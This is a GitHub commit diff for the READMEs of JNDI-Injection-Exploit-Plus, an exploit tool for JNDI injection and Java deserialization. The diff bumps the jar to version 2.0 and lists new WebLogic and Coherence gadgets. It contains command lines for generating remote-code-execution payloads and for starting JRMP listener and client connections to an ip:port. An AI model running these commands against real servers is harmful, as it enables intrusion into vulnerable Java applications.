Skip to content

Commit ecc9509

Browse files
committed
update readme
1 parent 81495b0 commit ecc9509

File tree

2 files changed

+24
-18
lines changed

2 files changed

+24
-18
lines changed

README.md

Lines changed: 15 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
3535
Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
3636
Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
3737

38-
#### 3. Deserailization Gadget (total: 58)
38+
#### 3. Deserailization Gadget (total: 64)
3939

4040
P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
4141

@@ -51,6 +51,8 @@ Coherence1 :arrow_up: |@cckuailong |coherence:3.7.1.0,
5151
Coherence2 :arrow_up: |@cckuailong |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
5252
Coherence3 :arrow_up: |@cckuailong |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
5353
Coherence4 :arrow_up: |@cckuailong |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
54+
Coherence5 :arrow_up: |@cckuailong |coherence:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
55+
Coherence6 :arrow_up: |@cckuailong |coherence:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
5456
CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2
5557
CommonsBeanutils2 :arrow_up: |@cckuailong |commons-beanutils:1.9.2
5658
CommonsCollections1 |@frohoff |commons-collections:3.1
@@ -97,6 +99,10 @@ Weblogic4 :arrow_up: |@cckuailong |weblogic.common.int
9799
Weblogic5 :arrow_up: |@cckuailong |weblogic:12.2.1.4, coherence
98100
Weblogic6 :arrow_up: |@cckuailong |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
99101
Weblogic7 :arrow_up: |@cckuailong |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
102+
Weblogic8 :arrow_up: |@cckuailong |weblogic:12.2.1.3, 12.2.1.4, 14.1.1.0
103+
Weblogic9 :arrow_up: |@cckuailong |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
104+
Weblogic10 :arrow_up: |@cckuailong |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
105+
Weblogic11 :arrow_up: |@cckuailong |weblogic:12.2.1.3, 12.2.1.4, 14.1.1.0
100106
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4
101107
WildFly1 :arrow_up: |@hugow |org.wildfly:wildfly-connector:26.0.1.Final
102108

@@ -118,15 +124,15 @@ Apereo | Apereo 4.1 Deserialization RCE
118124
- Example
119125

120126
```shell
121-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
127+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
122128
```
123129

124130
![](./img/4.png)
125131

126132
#### Web service to return Deserial Gadgets
127133

128134
```shell
129-
java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar
135+
java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar
130136
```
131137

132138
```shell
@@ -146,7 +152,7 @@ P.S. Param wrapper & output is opetional
146152
Run as
147153

148154
```shell
149-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-A] [address]
155+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
150156
```
151157

152158
where:
@@ -176,7 +182,7 @@ Points for attention:
176182
Run as
177183

178184
```shell
179-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
185+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
180186
```
181187

182188
where:
@@ -194,13 +200,13 @@ where:
194200
- JRMPListener
195201

196202
```shell
197-
java -cp JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
203+
java -cp JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
198204
```
199205

200206
- JRMPClient
201207

202208
```shell
203-
java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
209+
java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
204210
```
205211

206212
## Examples
@@ -212,7 +218,7 @@ Local demo:
212218
1. Start the tool like this:
213219

214220
```shell
215-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
221+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
216222
```
217223

218224
Screenshot:
@@ -243,7 +249,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
243249
### Deserialization Payloads
244250

245251
```shell
246-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
252+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
247253
```
248254

249255
Base64 Output Result:

README_zh.md

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -12,14 +12,14 @@ JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目
1212

1313
- 远程Reference链 (3种)
1414
- 本地Reference链 (4种)
15-
- 反序列化链(54种
15+
- 反序列化链(64种
1616

1717
P.S. 具体利用链名称及依赖见 [表格](./README.md)
1818

1919
#### 使用方法
2020

2121
```
22-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-A] [address]
22+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
2323
```
2424

2525
#### 参数说明
@@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-A]
3939
1. 运行工具
4040

4141
```
42-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
42+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
4343
```
4444

4545
![](./img/1.png)
@@ -64,7 +64,7 @@ class Test{
6464
#### 使用方法
6565

6666
```
67-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
67+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
6868
```
6969

7070
#### 参数说明
@@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar [-C] [command] [-D]
8484
1. 普通
8585

8686
```
87-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
87+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
8888
```
8989

9090
![](./img/3.png)
@@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "/System/Applica
9393

9494
- JRMPListener
9595
```
96-
java -cp JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
96+
java -cp JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
9797
```
9898

9999
- JRMPClient
100100
```
101-
java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
101+
java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
102102
```
103103

104104
#### 提供反序列化包装器
@@ -111,15 +111,15 @@ Apereo | Apereo 4.1 反序列化漏洞
111111
- 示例
112112

113113
```shell
114-
$ java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
114+
$ java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
115115
```
116116

117117
![](./img/4.png)
118118

119119
#### 可以返回反序列化数据的web服务
120120

121121
```shell
122-
java -jar JNDI-Injection-Exploit-Plus-1.9-SNAPSHOT-all.jar
122+
java -jar JNDI-Injection-Exploit-Plus-2.0-SNAPSHOT-all.jar
123123
```
124124

125125
```shell

0 commit comments

Comments
 (0)